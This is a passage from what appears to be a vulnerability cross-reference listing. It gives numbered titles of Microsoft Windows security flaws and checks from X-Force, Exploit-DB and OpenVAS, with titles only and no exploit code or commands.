service [7125] Microsoft Windows NT Index Server &quot [7107] Microsoft Windows NT Xenroll denial of service [7008] Microsoft Windows 2000 IrDA device denial of service [6977] Microsoft Windows NT and 2000 NNTP memory leak denial of service [6962] Microsoft Windows Media Player .ASF marker buffer overflow [6943] Microsoft Windows NT NT4ALL denial of service [6931] Microsoft Windows 2000 without Service Pack 2 [6924] Microsoft Windows 98 ARP packet flooding denial of service [6919] Microsoft Windows 2000 Task Manager does not terminate malicious files with the same name as a system process [6914] Multiple Microsoft products malformed RPC request denial of service [6912] Microsoft Windows NT and 2000 Terminal Server RDP memory leak denial of service [6907] Microsoft Windows Media Player .NSC buffer overflow [6876] Microsoft Windows 2000 could allow an attacker to change network passwords [6874] Microsoft Windows 95/98 invalid path in registry could allow malicious file execution [6803] Microsoft Windows 2000 SMTP service allows mail relaying [6745] Microsoft Windows 2000 LDAP function could allow domain user password change [6669] Microsoft Windows 2000 Telnet system call denial of service [6668] Microsoft Windows 2000 Telnet handle leak denial of service [6667] Microsoft Windows 2000 Telnet multiple idle sessions denial of service [6666] Microsoft Windows 2000 Telnet username denial of service [6665] Microsoft Windows 2000 Telnet service weak domain authentication [6664] Microsoft Windows 2000 Telnet service predictable pipe names could allow elevation of privileges [6590] Microsoft Windows 2000 debug registers allow attacker to gain elevated privileges [6584] Microsoft Windows Media Player HTML code hidden in Internet shortcuts [6518] Microsoft Windows Index Server could allow attackers to view files on the Web server [6517] Microsoft Windows NT Index Server &quot [6506] Microsoft Windows 2000 Server Kerberos denial of service [6443] Microsoft Windows 2000 catalog file could remove installed hotfixes [6441] Microsoft Windows NT drivers DbgPrint function format string [6294] Microsoft Windows Me and Plus! 98 recovery of Compressed Folder passwords [6275] Microsoft Windows user.dmp file insecure permissions [6227] Microsoft Windows Media Player allows remote attackers to execute commands in Internet Explorer [6160] Microsoft Windows 2000 event viewer buffer overflow [6136] Microsoft Windows 2000 domain controller denial of service [6103] Microsoft Windows NT PPTP denial of service [6070] Microsoft Windows UDP socket denial of service [6062] Microsoft Windows DDE allows privilege elevation [6035] Microsoft Windows 2000 Server RDP denial of service [6006] Microsoft Windows NT mutex denial of service [5973] Microsoft Windows 2000 EFS allows local user to recover sensitive data [5937] Microsoft Windows Media Player skins can be used to execute arbitrary code [5936] Microsoft Windows 2000 Server Directory Service Restore Mode allows user to login with blank password [5800] Microsoft Windows 2000 Index Service ActiveX controls allow unauthorized access to file information [5746] Microsoft Windows NT MSTask.exe denial of service [5673] Microsoft Windows NT MTS registry permissions [5672] Microsoft Windows NT SNMP registry permissions [5671] Microsoft Windows NT RAS registry permissions [5623] Microsoft Windows NT and 2000 Phone Book service buffer overflow [5598] Microsoft Windows 2000 Telnet daemon could allow a denial of service [5585] Microsoft Windows 2000 brute force attack [5573] Microsoft Windows NT SynAttackProtect denial of service [5502] Microsoft Windows 2000 Indexing Services ixsso.query [5489] Microsoft Windows NT Terminal Server GINA RegAPI.DLL buffer overflow [5467] Microsoft Windows 2000 System Monitor ActiveX control buffer overflow [5417] Microsoft Windows NT MSIEXEC service uses the msi.dll registery key that has weak permissions [5411] Microsoft Windows File Share service denial of service [5399] Microsoft Windows NT and 2000 Network Monitor buffer overflow [5395] Microsoft Windows 9x share level password [5387] Microsoft Windows HyperTerminal Telnet buffer overflow [5370] Microsoft Windows 9x NetBIOS invalid driver type denial of service [5357] Microsoft Windows 9x malformed NWLink NMPI packet denial of service [5315] Microsoft Windows NT invalid LPC request [5301] Microsoft Windows 2000 Simplified Chinese IME State Recognition [5242] Microsoft Windows 2000 Telnet client NTLM authentication weakness [5203] Microsoft Windows 2000 still image service [5193] Microsoft Windows Media Services Unicast Service denial of service [5171] Microsoft Windows 2000 Local Security Policy corruption [5168] Microsoft Windows NetBIOS cache corruption [5097] Microsoft Windows folder.htt allows execution of active scripting without approval [5079] Microsoft Windows 95/98 malformed IPX ping packet denial of service [5040] Microsoft Windows NT/2000 explorer.exe uses relative path name in registry [5035] Microsoft Windows NT/2000 NetBIOS Name Server spoofed name conflict [5033] Microsoft Windows 2000 without Service Pack 1 [5031] Microsoft Windows 2000 Service Control Manager named pipe could allow a unauthorized user to gain privileges [5015] Microsoft Windows NT and 2000 executable path [4887] Microsoft Windows 2000 Kerberos ticket renewed [4886] Microsoft Windows 2000 logon session reconnected [4885] Microsoft Windows 2000 logon session disconnected [4882] Microsoft Windows 2000 Kerberos pre-authentication failed [4873] Microsoft Windows 2000 user account mapped for logon [4872] Microsoft Windows 2000 account logon failed [4871] Microsoft Windows 2000 account used for logon [4855] Microsoft Windows 2000 group type change [4828] Microsoft Windows 95/98 ARP spoofing [4823] Microsoft Windows 2000 Telnet server binary stream denial of service [4819] Microsoft Windows 2000 default SYSKEY configuration [4787] Microsoft Windows 2000 user account locked out [4786] Microsoft Windows 2000 computer account created [4785] Microsoft Windows 2000 computer account changed [4784] Microsoft Windows 2000 computer account deleted [4714] Microsoft Windows 2000 &quot [4702] Microsoft Windows event log full [4700] Microsoft Windows computer password not found in local security database [4698] Microsoft Windows EventLog service started [4688] Microsoft Windows Network Monitor driver started [4673] Microsoft Windows resources for queuing of audit messages have been exhausted [4671] Microsoft Windows event log file cannot be opened [4670] Microsoft Windows event log file corrupted [4648] Microsoft Windows NT malformed remote registry request denial of service [4608] Microsoft Windows NT computer account creation can compromise User Session Key [4600] Microsoft Windows NT denial of service caused by unacknowledged SMB requests [4589] Microsoft Windows 2000 protected store can be compromised by brute force attack [4585] Microsoft Windows Encoder denial of service [4552] Microsoft Windows Browser service can be shutdown by an unauthorized remote user [4547] Microsoft Windows Master Browser browse table can be filled with bogus entries [4517] Microsoft Windows NT user account locked out [4516] Microsoft Windows NT user account enabled [4515] Microsoft Windows NT user account disabled [4337] Microsoft Windows NT/2000 cmd.exe buffer overflow [4332] Microsoft Windows NT registry permissions could allow compromise of cryptographic keys [4278] Microsoft Windows 2000 unattended install does not secure All Users profile [4247] Microsoft Windows 95/98 printer sharing allows read access [4221] Microsoft Windows NT drive mapping allows local users to execute arbitrary code [4203] Microsoft Windows TCP/IP Printing Service denial of service [4141] Microsoft Windows can be configured to transmit unencrypted passwords to SMB server [4140] Microsoft Windows Telnet service authentication may expose user passwords [4138] Microsoft Windows 2000 system file integrity feature is disabled [4111] Microsoft Windows NT 4.0 registry permissions [4108] Microsoft Windows Media Technologies malformed license request denial of service [4107] Microsoft Windows path names containing DOS devices denial of service [4086] Microsoft Windows 2000 may not start Jaz drives correctly [4085] Microsoft Windows 2000 non-Gregorial calendar error [4084] Microsoft Windows 2000 may prevent Adobe FrameMaker files from being saved in some formats [4083] Microsoft Windows 2000 Terminal Services may damage Office files saved as HTML [4082] Microsoft Windows 2000 and Iomega parallel port drives display error [4081] Microsoft Windows invalid image error when using OLE libraries [4080] Microsoft Windows 2000 AOL image support [4079] Microsoft Windows 2000 High Encryption Pack [4034] Microsoft Windows Media Services handshake packets denial of service [4016] Microsoft Windows NT Recycle Bin could allow an unauthorized user to modify deleted files [3993] Microsoft Windows Trin00 Distributed Denial of Service (DDoS) tool found [3909] Microsoft Windows 9x share is writable [3906] Microsoft Windows NT share is readable [3694] Microsoft Windows NT malformed resource enumeration denial of service [3574] Microsoft Windows 9x cache could reveal plaintext password [3534] Microsoft Windows NT 4.0 without Service Pack 6 [3373] Microsoft Windows NT user shell folders could allow users to gain administrator privileges [3328] Microsoft Windows ARP packet denial of service [3251] Microsoft Windows allows source routing when configured to reject source routed packets [3248] Microsoft Windows NT RASMAN pathname [3226] Microsoft Windows NT 4.0 unattended installation could expose sensitive information to local users [3168] Microsoft Windows NT SP4-SP6 TCP sequence numbers are predictable [3129] Microsoft Windows Telnet.exe remote buffer overflow [3109] Microsoft Windows NT Phone Dialer utility contains a locally exploitable buffer overflow [3106] Microsoft Windows NT DNS server can be remotely crashed by sending a response to a non-existant request [3104] Microsoft Windows NT TSE denial of service can consume all available memory [2750] Microsoft Windows started/stopped [2677] Microsoft Windows NT old operating system [2549] Microsoft Windows NT install date changed [2336] Microsoft Windows NT login default folder allows a user to bypass policies [2313] Microsoft Windows NT can be crashed by executables containing malformed image headers [2299] Microsoft Windows NT CSRSS denial of service [2291] Microsoft Windows NT Local Security Authority (LSA) can be remotely crashed, requiring a system reboot [2243] Microsoft Windows NT RAS/RRAS clients cache passwords regardless of setting [2201] Microsoft Windows NT 4.0 without Service Pack 5 [2200] Microsoft Windows NT RAS client contains an exploitable buffer overflow [2190] Microsoft Windows NT 4.0 help file utility contains a locally exploitable buffer overflow [2141] Microsoft SQL Server can be configured to use the Windows NT account SQLExecCmdExe when running xp_cmdshell for non-sa logins [2129] Microsoft SQL Server should use limited Windows NT protocols to make attacks more difficult [2102] Microsoft Windows NT allows files to exceed the supposed maximum length [1976] Microsoft Windows NT gina flaw allows locked-out users to log in [1975] Microsoft Windows NT gina allows some clipboard text to be revealed [1974] Microsoft Windows NT SNMP agent memory leak [1947] Microsoft Windows NT/9x can be frozen with redirect packets [1946] Microsoft Windows NT screen saver can be used to compromise administrator privileges [1820] Microsoft Windows NT 4.0 domain caching feature can be exploited to gain administrator privileges [1771] Microsoft Windows 95/98 configurations may lead to excessive bandwidth consumption [1758] Microsoft SQL Server extended stored procedure, xp_cmdshell, can be used to gain Windows NT administrator rights [1719] Microsoft Windows NT 4.0 SP4 could allow null passwords to be used for access [1566] Microsoft Windows NT user account deleted [1556] Microsoft Windows NT user account created [1394] Microsoft Windows NT 4.0 without Service Pack 4 [1372] Microsoft Windows NT snork attack can disable system [1321] Microsoft Windows Interactive_Guest_Logon [1320] Microsoft Windows legal notice display not enabled [1319] Microsoft Windows local user on workstation [1315] Microsoft Windows network Guest logon [1314] Microsoft Windows NT user has never logged on [1312] Microsoft Windows NT null session user modals [1296] Microsoft Windows service user [1295] Microsoft Windows NT service user password found [1291] Microsoft Windows shutdown without logon enabled [1288] Microsoft Windows NT system key encryption not enabled [1286] Microsoft Windows NT TCP/IP security not enabled [1285] Microsoft Windows trojan key permissions [1284] Microsoft Windows NT trusted domain [1075] Microsoft Windows file-sharing access error [981] Microsoft Windows WINS exploit using SNMP [710] Microsoft Windows NT portbind issue [679] Microsoft Windows null session [539] Microsoft Windows 95 and Internet Explorer password disclosure [538] Microsoft Windows NT Winpopup DoS attack [536] Microsoft Windows NT discloses system information [535] Microsoft Windows NT sometimes does not kill all processes when logging out [534] Microsoft Windows 95 stores many passwords in plain text in the registry [530] Microsoft Windows NT RAS service packet filtering rules can be bypassed [529] Microsoft Windows NT case problems can lead to admin access [528] Microsoft Windows NT fragmentation attack [526] Microsoft Windows NT path is insecure and can be easily trojaned [342] Microsoft Windows NT SMB logon denial of service [283] Microsoft Windows account password guessed [186] Microsoft Windows NT DNS denial of service [172] Microsoft Windows NT Post-SP2 security patches missing [168] Microsoft Windows key with incorrect permissions [140] Microsoft Windows telnet service installed [138] Microsoft Windows system log accessible [121] Microsoft Windows NT security log accessible [120] Microsoft Windows schedule service running [114] Microsoft Windows NT rsh service Running [102] Microsoft Windows NT rexec service running [99] Microsoft Windows registry can be opened remotely [98] Microsoft Windows NT rcmd service running [92] Microsoft Windows NT rlogin service installed [66] Microsoft Windows NT kernel outdated [16] Microsoft Windows Remote Access Service [14] Microsoft Windows NT 4.0 without Service Pack 3 [13] Microsoft Windows Network Monitor insecure password [11] Microsoft Windows NT 4.0 beta Exploit-DB - https://www.exploit-db.com: [22917] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [21954] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (4) [21953] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (3) [21952] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (2) [21951] Microsoft Windows XP/2000/NT 4 RPC Service Denial of Service Vulnerability (1) [3746] Microsoft Windows DNS RPC - Remote Buffer Overflow Exploit (port 445) (2) [30825] Microsoft Windows Media Digital Rights Management ActiveX Control Buffer Overflow Vulnerability [30645] Microsoft Windows URI Handler Command Execution Vulnerability [30636] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (2) [30635] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (1) [30619] Microsoft Windows Explorer PNG Image - Local Denial Of Service Vulnerability [30462] Microsoft Windows Media Player 11 - AU Divide-By-Zero Denial of Service Vulnerability [30392] Microsoft Windows ndproxy.sys - Local Privilege Escalation [30160] Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Vulnerability [29813] Microsoft Windows Vista ARP Table Entries Denial of Service Vulnerability [29771] Microsoft Windows Vista Windows Mail Local File Execution Vulnerability [29738] Microsoft Windows XP/2000 WinMM.DLL - WAV Files Remote Denial of Service (DoS) Vulnerability [29659] Microsoft Windows XP/2003 Explorer WMF File Handling Denial of Service Vulnerability [29630] Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability [29286] Microsoft Windows Explorer explorer.exe WMV File Handling DoS [29285] Microsoft Windows Media 6.4/10.0 - MID Malformed Header Chunk DoS [28834] Microsoft Windows XP CMD.EXE Buffer Overflow Vulnerability [28482] MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution [28420] Microsoft Windows 2000 Multiple COM Object Instantiation Code Execution Vulnerabilities [28381] microsoft windows xp/2000/2003 help Multiple Vulnerabilities [28357] Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution Vulnerability [28299] Microsoft Windows XP/2000/2003 Graphical Device Interface Plus Library Denial of Service Vulnerability [28263] Microsoft Windows XP/2000/2003 Remote Denial of Service Vulnerability [28227] Microsoft Windows 2000/XP Registry Access Local Denial of Service Vulnerability [27930] Microsoft Windows XP/2000/2003 MHTML URI Buffer Overflow Vulnerability [27851] Microsoft Windows - Path Conversion Weakness [27051] Microsoft Windows Graphics Rendering Engine Multiple Memory Corruption Vulnerabilities [26690] Microsoft Windows 2000/2003/XP CreateRemoteThread Local Denial of Service Vulnerability [26341] Microsoft Windows 2000/2003/XP MSDTC TIP Denial of Service Vulnerability [26323] Microsoft Windows XP Wireless Zero Configuration Service Information Disclosure Vulnerability [26222] Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness [25962] Microsoft ASP.NET 1.0/1.1 RPC/Encoded Remote Denial of Service Vulnerability [25737] Microsoft Windows 98SE User32.DLL Icon Handling Denial of Service Vulnerability [25454] Microsoft Windows 98/2000 Explorer Preview Pane Script Injection Vulnerability [25384] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (2) [25383] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (1) [25268] Microsoft Windows XP TSShutdn.exe Remote Denial of Service Vulnerability [25259] Microsoft Windows XP Local Denial of Service Vulnerability [25231] Microsoft Windows 2000/2003/XP Graphical Device Interface Library Denial of Service Vulnerability [25050] Microsoft Windows 2000/2003/XP winhlp32 Phrase Heap Overflow Vulnerability [25049] Microsoft Windows 2000/2003/XP winhlp32 Phrase Integer Overflow Vulnerability [24699] Microsoft Windows XP WAV File Handler Denial of Service Vulnerability [24682] Microsoft Windows XP Weak Default Configuration Vulnerability [24605] Microsoft Windows XP Explorer.EXE TIFF Image Denial of Service Vulnerability [24277] Microsoft Windows 2000/NT 4 POSIX Subsystem Buffer Overflow Local Privilege Escalation Vulnerability [24173] PHP 4.3.x Microsoft Windows Shell Escape Functions Command Execution Vulnerability [24125] Microsoft Windows XP Self-Executing Folder Vulnerability [24051] Microsoft Windows XP/2000/NT 4 Shell Long Share Name Buffer Overrun Vulnerability [23989] Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability [23850] Microsoft Windows XP Explorer.EXE Remote Denial of Service Vulnerability [23717] Microsoft Windows XP Help And Support Center Interface Spoofing Weakness [23675] Microsoft Windows XP HCP URI Handler Arbitrary Command Execution Vulnerability [23504] Microsoft Windows XP/2000 showHelp CHM File Execution Weakness [23247] Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability [23229] Microsoft Windows XP/2000/2003 Message Queuing Service Heap Overflow Vulnerability [23210] Microsoft Windows XP/2000 PostThreadMessage() Arbitrary Process Killing Vulnerability [23179] Oracle MySQL for Microsoft Windows MOF Execution [23101] Microsoft Windows 98 Fragmented UDP Flood Denial of Service Vulnerability [23093] Microsoft Windows XP TCP Packet Information Leakage Vulnerability [23019] Microsoft Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability [22883] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (2) [22882] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (1) [22870] Microsoft Windows XP/2000 RunDLL32.EXE Buffer Overflow Vulnerability [22837] Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow [22824] Microsoft Windows XP/2000/NT 4 HTML Converter HR Align Buffer Overflow Vulnerability [22782] Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability [22570] Microsoft Windows Media Player 7.1 Skin File Code Execution Vulnerability [22528] Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability [22368] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4) [22367] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3) [22366] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2) [22365] Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1) [22354] Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow Vulnerability [22303] Microsoft Windows Help program (WinHlp32.exe) Crash PoC [22289] Microsoft Windows XP/ME Help and Support Center Buffer Overflow Vulnerability [22255] Microsoft Windows XP/95/98/2000/NT 4 Riched20.dll Attribute Buffer Overflow Vulnerability [22245] Microsoft Windows NT/2000 cmd.exe CD Buffer Overflow Vulnerability [22232] Microsoft Windows XP HCP URI Buffer Overflow Vulnerability [22225] Microsoft Windows XP Redirector Privilege Escalation Vulnerability [22194] Microsoft Windows XP/2000/NT 4 Locator Service Buffer Overflow Vulnerability [22132] Microsoft Windows XP/2000 Fontview Denial of Service Vulnerability [21717] Microsoft Windows XP HCP URI Handler Abuse Vulnerability [21670] Microsoft Windows Media Player 6/7 Filename Buffer Overflow Vulnerability [21485] Microsoft Windows 95/98/2000/NT4 WinHlp Item Buffer Overflow Vulnerability [21389] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (2) [21388] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (1) [21344] Microsoft Windows 2000 / NT 4.0 Process Handle Local Privilege Elevation Vulnerability [21258] Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability [21246] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (2) [21245] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (1) [21240] Microsoft Windows XP .Manifest Denial of Service Vulnerability [21172] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (2) [21171] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (1) [21131] Microsoft Windows 2000/XP GDI Denial of Service Vulnerability [21130] Microsoft Windows NT 3/4 CSRSS Memory Access Violation Vulnerability [21123] Microsoft Windows 2000/NT Terminal Server Service RDP DoS Vulnerability [21099] Microsoft Windows 2000 RunAs Service Denial of Services Vulnerability [21069] Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability [21047] Microsoft Windows NT 4.0 NT4ALL DoS Vulnerability [20907] Microsoft Windows 2000 Telnet Username DoS Vulnerability [20861] Microsoft Windows Kernel Intel x64 SYSRET PoC [20613] Microsoft Windows 98/2000 UDP Socket DoS Vulnerability [20596] Microsoft Windows NT 4.0 Networking Mutex DoS Vulnerability [20564] Microsoft Windows NT 4.0 SNMP-WINS DoS Vulnerability [20553] Microsoft Windows Media Player 7.0 .WMZ Arbitrary Java Applet Vulnerability [20528] Microsoft Windows Media Player 7.0 Javascript URL Vulnerability [20460] Microsoft Windows NT 4.0 PhoneBook Server Buffer Overflow [20427] Microsoft Windows Media Player 7.0 .ASX Buffer Overflow Vulnerability [20424] Microsoft Windows Media Player 7.0 .WMS Arbitrary Script Vulnerability [20399] Microsoft Indexing Services for Windows 2000 File Verification Vulnerability [20371] Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability [20335] Microsoft Indexing Services for Windows 2000/NT 4.0 .htw Cross-Site Scripting Vulnerability [20317] Microsoft Windows NT 4.0 MSIEXEC Registry Permissions Vulnerability [20288] Microsoft Windows 9x File Handle Buffer Overflow Vulnerability [20284] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (2) [20283] Microsoft Windows 9x / Me Share Level Password Bypass Vulnerability (1) [20265] Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability [20257] Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities [20255] Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS Vulnerability [20254] Microsoft Windows NT 4.0 Invalid LPC Request DoS Vulnerability [20243] Microsoft Windows Script Host 5.1/5.5 GetObject() File Disclosure Vulnerability [20240] Microsoft Windows Media Player 7 Embedded OCX Control Vulnerability [20222] Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability [20209] Microsoft Windows 2000 Still Image Service Privilege Escalation Vulnerability [20133] Microsoft Windows 2000 Named Pipes Predictability Vulnerability [20106] Microsoft Windows NT 4/2000 NetBIOS Name Conflict Vulnerability [20048] Microsoft Windows 2000 Remote CPU-overload Vulnerability [20047] Microsoft Windows 2000 Telnet Server DoS Vulnerability [19974] Microsoft Windows Media Services 4.0/4.1 DoS Vulnerability [19889] Microsoft Windows 95/98 NetBIOS NULL Name Vulnerability [19798] Microsoft Windows NT 4.0 User Shell Folders Vulnerability [19759] Microsoft Windows Media Services 4.0/4.1 Handshake Sequence DoS [19754] Microsoft Windows 95/98/NT 4.0 autorun.inf Vulnerability [19739] Microsoft Windows NT 4.0 Recycle Bin Pre-created Folder Vulnerability [19731] microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal [19673] Microsoft Windows 95/98/NT 4.0 Help File Trojan Vulnerability [19578] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (2) [19577] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (1) [19502] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 RASMAN Privilege Escalation Vulnerability [19489] Microsoft Windows NT 4.0 DCOM Server Vulnerability [19462] Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability [19451] Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability [19440] Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability [19372] Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name Vulnerability [19359] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4,Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 Screensaver Vulnerability [19239] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability [19238] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability [19211] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Phonebook Buffer Overflow Vulnerability [19209] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Help File Buffer Overflow Vulnerability [19198] Microsoft Windows NT <= 4.0 SP4 Known DLL Cache Vulnerability [19197] "Microsoft Windows NT <= 4.0 SP5,Terminal Server 4.0 ""Pass the Hash"" with Modified SMB Client Vulnerability" [19196] "Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking ""Save Password"" Vulnerability" [19195] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability [19143] "Microsoft Windows ""April Fools 2001"" Vulnerability" [19113] Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd Vulnerability [19103] HP HP-UX <= 10.34,Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 [19002] Microsoft Windows OLE Object File Handling Remote Code Execution [18819] Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability [18372] Microsoft Windows Assembly Execution Vulnerability MS12-005 [17305] "Microsoft Windows Vista/Server 2008 ""nsiproxy.sys"" Local Kernel DoS Exploit" [17133] Microsoft Windows xp AFD.sys Local Kernel DoS Exploit [17037] PostgreSQL for Microsoft Windows Payload Execution [16957] Oracle MySQL for Microsoft Windows Payload Execution [16749] Microsoft RPC DCOM Interface Overflow [16748] Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP) [16660] Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow [16574] Microsoft Windows Shell LNK Code Execution [16374] Microsoft Windows Authenticated User Code Execution [16366] Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) [16363] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference [16360] Microsoft Windows SMB Relay Code Execution [15839] Microsoft Windows Fax Services Cover Page Editor (.cov) Memory Corruption [14778] Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll) [14733] Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll) [14731] Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx) [14705] Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability [14674] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050) [14670] Microsoft Windows nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047) [14669] Microsoft Windows win32k!GreStretchBltInternal() Does Not Handle src == dest [14668] Microsoft Windows win32k!xxxRealDrawMenuItem() Missing HBITMAP Bounds Checks [14667] Microsoft Windows KTM Invalid Free with Reused Transaction GUID (MS10-047) [14666] Microsoft Windows nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047) [14611] Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048) [14610] Microsoft Windows Tracing Registry Key ACL Privilege Escalation Vulnerability [14608] Microsoft Windows CreateWindow Function Callback Vulnerability (MS10-048) [14566] "Microsoft Windows win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow" [14403] Microsoft Windows Automatic LNK Shortcut File Code Execution [13808] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly [13532] MS Windows (DCOM RPC2) Universal Shellcode [12564] Microsoft Windows Outlook Express and Windows Mail Integer Overflow [11195] Microsoft Windows Defender ActiveX Heap Overflow PoC [10068] Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution [9301] Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit [4934] MS Windows Message Queuing Service RPC BOF Exploit (dnsname) [4745] MS Windows Message Queuing Service RPC BOF Exploit (MS07-065) [4045] Microsoft Windows Animated Cursor Stack Overflow Exploit [3737] MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4) [3453] MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption [1352] Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated) [293] MS Windows Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011) [117] MS Windows XP/2000 RPC Remote (non exec memory) Exploit [109] MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039) [103] MS Windows (RPC DCOM2) Remote Exploit (MS03-039) [100] MS Windows (RPC DCOM) Long Filename Overflow Exploit (MS03-026) [97] MS Windows (RPC DCOM) Scanner (MS03-039) [76] MS Windows (RPC DCOM) Remote Exploit (Universal Targets) [70] MS Windows (RPC DCOM) Remote Exploit (48 Targets) [69] MS Windows RPC DCOM Remote Exploit (18 Targets) [66] MS Windows (RPC DCOM) Remote Exploit (w2k+XP Targets) [64] MS Windows (RPC DCOM) Remote Buffer Overflow Exploit [61] MS Windows 2000 RPC DCOM Interface DoS Exploit [5] MS Windows RPC Locator Service Remote Exploit OpenVAS (Nessus) - http://www.openvas.org: [903041] Microsoft Windows Kernel Privilege Elevation Vulnerability (2724197) [903036] Microsoft Windows Networking Components Remote Code Execution Vulnerabilities (2733594) [903035] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerability (2731847) [903033] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2718523) [902936] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2783534) [902933] Microsoft Windows Shell Remote Code Execution Vulnerabilities (2727528) [902916] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (2711167) [902909] Microsoft Windows Service Pack Missing Multiple Vulnerabilities [902908] Microsoft Windows DirectWrite Denial of Service Vulnerability (2665364) [902906] Microsoft Windows DNS Server Denial of Service Vulnerability (2647170) [902900] Microsoft Windows SSL/TLS Information Disclosure Vulnerability (2643584) [902846] Microsoft Windows TLS Protocol Information Disclosure Vulnerability (2655992) [902845] Microsoft Windows Shell Remote Code Execution Vulnerability (2691442) [902829] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258) [902807] 